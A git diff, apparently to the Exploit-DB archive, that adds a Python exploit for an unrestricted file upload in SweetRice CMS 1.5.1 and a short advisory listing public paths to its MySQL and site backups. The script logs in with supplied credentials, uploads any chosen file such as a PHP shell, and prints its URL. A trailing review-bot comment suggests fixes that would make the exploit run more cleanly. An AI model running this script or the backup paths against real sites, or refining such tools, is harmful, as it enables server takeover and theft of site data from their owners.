diff --git a/files.csv b/files.csv
index bb26fa912..76fdce090 100755
--- a/files.csv
+++ b/files.csv
@@ -30774,6 +30774,7 @@ id,file,description,date,author,platform,type,port
 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
 34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
+40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
 34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
 34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
 34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
@@ -30803,6 +30804,7 @@ id,file,description,date,author,platform,type,port
 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
 34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
+40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
diff --git a/platforms/php/webapps/40716.py b/platforms/php/webapps/40716.py
new file mode 100755
index 000000000..aa9270bdf
--- /dev/null
+++ b/platforms/php/webapps/40716.py
@@ -0,0 +1,68 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+import requests
+import os
+from requests import session
+
+if os.name == 'nt':
+ os.system('cls')
+else:
+ os.system('clear')
+ pass
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+| _________ __ __________.__ |
+| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
+| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
+| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
+|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
+| \/ \/ \/ \/ \/ \/ |
+| > SweetRice 1.5.1 Unrestricted File Upload |
+| > Script Cod3r : Ehsan Hosseini |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+print(banner)
+
+
+# Get Host & User & Pass & filename
+host = input("Enter The Target URL(Example : localhost.com) : ")
+username = input("Enter Username : ")
+password = input("Enter Password : ")
+filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
+file = {'upload[]': open(filename, 'rb')}
+
+payload = {
+ 'user':username,
+ 'passwd':password,
+ 'rememberMe':''
+}
+
+
+
+with session() as r:
+ login = r.post('http://' + host + '/as/?type=signin', data=payload)
+ success = 'Login success'
+ if login.status_code == 200:
+ print("[+] Sending User&Pass...")
+ if login.text.find(success) > 1:
+ print("[+] Login Succssfully...")
+ else:
+ print("[-] User or Pass is incorrent...")
+ print("Good Bye...")
+ exit()
+ pass
+ pass
+ uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
+ if uploadfile.status_code == 200:
+ print("[+] File Uploaded...")
+ print("[+] URL : http://" + host + "/attachment/" + filename)
+ pass
\ No newline at end of file
diff --git a/platforms/php/webapps/40718.txt b/platforms/php/webapps/40718.txt
new file mode 100755
index 000000000..e5208a6a9
--- /dev/null
+++ b/platforms/php/webapps/40718.txt
@@ -0,0 +1,19 @@
+Title: SweetRice 1.5.1 - Backup Disclosure
+Application: SweetRice
+Versions Affected: 1.5.1
+Vendor URL: http://www.basic-cms.org/
+Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+Discovered by: Ashiyane Digital Security Team
+Tested on: Windows 10
+Bugs: Backup Disclosure
+Date: 16-Sept-2016
+
+
+Proof of Concept :
+
+You can access to all mysql backup and download them from this directory.
+http://localhost/inc/mysql_backup
+
+and can access to website files backup from:
+http://localhost/SweetRice-transfer.zip
+
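Review bot: The first line of 40716.py, `#/usr/bin/python`, lacks the `!` that makes it an interpreter directive, so the 100755 mode the file is added with has no effect and a direct invocation fails; since the script uses `print(...)` and `input()` in their Python 3 forms, `#!/usr/bin/env python3` is presumably the intended line. The handle returned by `open(filename, 'rb')` when building the `file` dictionary is never closed, so it is only released at interpreter exit; wrapping the `with session() as r:` block in `with open(filename, 'rb') as fh:` and building the dictionary from `fh` would make the lifetime explicit. The failed-login branch calls `exit()`, which is the interactive helper installed by the `site` module rather than `sys.exit()`, and the trailing `pass` statements after each block are dead code that the indentation already terminates. The hunk holds the entire new file, so nothing is cut off at either edge.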